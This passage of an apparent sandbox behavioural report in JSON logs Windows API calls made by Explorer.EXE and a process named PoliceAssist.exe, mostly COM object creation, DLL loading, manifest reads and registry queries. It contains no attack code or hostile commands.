"0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-11-20 10:58:35,744", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-11-20 10:58:35,760", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-11-20 10:58:35,760", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-11-20 10:58:35,775", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 83 }, { "timestamp": "2025-11-20 10:58:35,775", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 84 }, { "timestamp": "2025-11-20 10:58:35,791", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-11-20 10:58:35,791", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-11-20 10:58:35,806", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-11-20 10:58:35,806", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-11-20 10:58:35,822", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-11-20 10:58:35,822", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-11-20 10:58:35,838", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 91 }, { "timestamp": "2025-11-20 10:58:35,838", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-11-20 10:58:35,853", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-11-20 10:58:35,853", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-11-20 10:58:35,869", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-11-20 10:58:35,869", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-11-20 10:58:35,885", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-11-20 10:58:35,885", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-11-20 10:58:35,900", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-11-20 10:58:35,900", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-11-20 10:58:36,056", "thread_id": "3360", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee349db07", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b361000" }, { "name": "RegionSize", "value": "0x00066000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-11-20 10:58:36,056", "thread_id": "3360", "caller": "0x7ffee10bacfe", "parentcaller": "0x7ffee2f93b78", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\system32\\WindowsInternal.ComposableShell.DesktopHosting" }, { "name": "DllBase", "value": "0x7ffed4520000" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-11-20 10:58:36,056", "thread_id": "3360", "caller": "0x7ffee34e0db0", "parentcaller": "0x7ffee34a0391", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed4520000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-11-20 10:58:36,056", "thread_id": "3360", "caller": "0x7ffee10bacfe", "parentcaller": "0x7ffee2f93b78", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\System32\\Windows.CloudStore.Schema.Shell" }, { "name": "DllBase", "value": "0x7ffece180000" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-11-20 10:58:36,056", "thread_id": "3360", "caller": "0x7ffee34e0db0", "parentcaller": "0x7ffee34a0391", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffece180000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-11-20 10:58:36,322", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736058f2b", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-11-20 10:58:36,322", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736058f2b", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-11-20 10:58:36,322", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-11-20 10:58:36,322", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-11-20 10:58:36,322", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-11-20 10:58:36,322", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-11-20 10:58:37,791", "thread_id": "2996", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee2f96b6d", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\Windows.CloudStore.Schema.Shell" }, { "name": "DllBase", "value": "0x7ffece180000" } ], "repeated": 0, "id": 112 } ], "threads": [ "3400", "2800", "2996", "2768", "3512", "2840", "4072", "4068", "4032", "3360" ], "environ": { "UserName": "Admin", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\Explorer.EXE", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff735ff0000", "MainExeSize": "0x00546000", "Bitness": "64-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 3308, "process_name": "PoliceAssist.exe", "parent_id": 2736, "module_path": "C:\\Temp\\PoliceAssist.exe", "first_seen": "2025-11-20 10:58:25,812", "calls": [ { "timestamp": "2025-11-20 10:58:26,000", "thread_id": "2188", "caller": "0x7ffee34dc2c7", "parentcaller": "0x7ffee34dc05a", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\wsock32" }, { "name": "BaseAddress", "value": "0x7ffedc870000" }, { "name": "InitRoutine", "value": "0x7ffedc871310" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee16742c4", "parentcaller": "0x7ffee1673b55", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000021c" }, { "name": "DesiredAccess", "value": "0x001200a9", "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE" }, { "name": "FileName", "value": "C:\\Windows\\WindowsShell.Manifest" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee1674459", "parentcaller": "0x7ffee1673b55", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000220" }, { "name": "DesiredAccess", "value": "0x00000004", "pretty_value": "SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000021c" }, { "name": "FileName", "value": "C:\\Windows\\WindowsShell.Manifest" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee16744a6", "parentcaller": "0x7ffee1673b55", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000220" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00800000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee166e7a0", "parentcaller": "0x7ffee1675084", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000001d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee166e7f0", "parentcaller": "0x7ffee1675084", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000001d8" }, { "name": "ValueName", "value": "PreferExternalManifest" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee166e818", "parentcaller": "0x7ffee1675084", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001d8" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee1686103", "parentcaller": "0x7ffee16751de", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000021c" }, { "name": "HandleName", "value": "C:\\Windows\\WindowsShell.Manifest" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x9e\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 7 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee1674f83", "parentcaller": "0x7ffee167468c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000021c" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee1674f8a", "parentcaller": "0x7ffee167468c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000220" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee167468c", "parentcaller": "0x7ffee1673b55", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00800000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee1672a0e", "parentcaller": "0x7ffecf603a53", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ThemePropScrollBarCtl" }, { "name": "Atom", "value": "0x0000c020" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee1672a0e", "parentcaller": "0x7ffecf603a6d", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "MicrosoftTabletPenServiceProperty" }, { "name": "Atom", "value": "0x0000c021" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffecf603bac", "parentcaller": "0x7ffecf603add", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00001022" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee10be76a", "parentcaller": "0x7ffecf603aeb", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "LPK" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee10be76a", "parentcaller": "0x7ffecf603b03", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "GDI32" }, { "name": "ModuleHandle", "value": "0x7ffee1850000" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffecf603b1e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1850000" }, { "name": "FunctionName", "value": "LpkEditControl" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee1875740" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffecf603b1e", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\\comctl32" }, { "name": "BaseAddress", "value": "0x7ffecf5a0000" }, { "name": "InitRoutine", "value": "0x7ffecf639e70" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee34dc2c7", "parentcaller": "0x7ffee34dc05a", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\psapi" }, { "name": "BaseAddress", "value": "0x7ffee15f0000" }, { "name": "InitRoutine", "value": "0x7ffee15f1110" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008ce000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\comdlg32" }, { "name": "BaseAddress", "value": "0x7ffee1510000" }, { "name": "InitRoutine", "value": "0x7ffee1543a50" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2188", "caller": "0x7ffee34e507d", "parentcaller": "0x7ffee34e4c43", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 21 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "2060", "caller": "0x7ffee34ceb32", "parentcaller": "0x7ffee34877c3", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000038" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 2, "id": 22 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "1600", "caller": "0x7ffee34e507d", "parentcaller": "0x7ffee34e4c43", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 23 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "404", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008d0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-11-20 10:58:26,016", "thread_id": "404", "caller": "0x7ffee34e507d", "parentcaller": "0x7ffee34e4c43", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 25 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400d415d", "parentcaller": "0x1400cdb19", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 26 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400cf0e0", "parentcaller": "0x1400cd9e4", "category": "misc", "api": "HeapCreate", "status": true, "return": "0x054c0000", "arguments": [ { "name": "Options", "value": "0" }, { "name": "InitialSize", "value": "0x00001000" }, { "name": "MaximumSize", "value": "0x00000000" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400cda54", "parentcaller": "0x00000000", "category": "misc", "api": "GetCommandLineW", "status": true, "return": "0x0089219a", "arguments": [ { "name": "CommandLine", "value": "\"C:\\Temp\\PoliceAssist.exe\" " } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400d0aa0", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054c2000" }, { "name": "RegionSize", "value": 